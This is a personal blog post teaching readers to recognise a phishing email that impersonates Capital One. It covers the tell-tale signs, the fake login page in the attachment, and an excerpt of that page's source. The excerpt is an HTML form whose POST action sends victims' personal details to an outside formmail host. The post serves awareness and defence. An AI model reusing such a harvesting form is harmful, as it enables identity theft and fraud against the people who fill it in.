Investigating email spam 🔎

Why it's important to always be vigilant

January 7, 2017

Most email providers do a decent job of filtering email spam. They're either outright deleted for you or put in a separate spam/junk/clutter folder. But, they're not perfect, and knowing how to spot the fakes becomes important. Submitting personally identifiable information (PII) to an unknown party allows them to open lines of credit, make purchases, assume your identity, etc. General rule of thumb is the more information given the more personal damage that can arise.

Backstory

A few days ago, my wife asked why she was locked out of her Capital One account. She received an email stating her "account has been temporarily suspended" and "You are required to provide neccessary information to regain access". A quick check on Capital One's site proved the former statement false. I had her show me the email and confirmed my suspicion of spam. Being the start of a new year, we went over what to look for when receiving these types of emails…

The email

Screenshot showing fake email from Capital One asking for PII

What's wrong?

Generic To-field (Recipients noreply@capitalone.com).
- Genuine emails of this importance should contain your email address.
Asking to download a file.
- Legitimate services will not ask to open/download any attachment to submit personal information.

Why does it look real?

Use of Capital One logo.
From-field looks legitimate.
- Remember, these header-fields can be faked.
Use of footer including copyright.

Opening the attachment

⚠️ DON'T DO THIS! ⚠️ FAKE overlay intentionally added.

Screenshot showing fake Capital One site via email attachment

What's wrong?

Potentially wrong customer number (maybe this is someone's number, I don't know)
Potentially outdated style of site. Here's a sample of how the real site looks as of 2017-01-07.

Why does it look real?

Use of Capital One logo.
Use of footer with items like FDIC and Equal Housing Lender.
- Not visible in the screenshot, but there is a mismatch between copyright years with the email message versus the attachment.
Links to capitalone.com or capitalone360.com domains.

Looking at the attachment source

This one section:

<form method="POST" action="http://fp1.formmail.com/cgi-bin/fm192">
    <!--All the fields used to get personal information-->
</form>

is just one reason why you never open attachments to emails! All the information provided is sent to the proprietor of the email (i.e. not Capital One).

Conclusions

I'll be brief: know that spam email can look very convincing, check for tell-tale signs of its legitimacy, and always think before you act.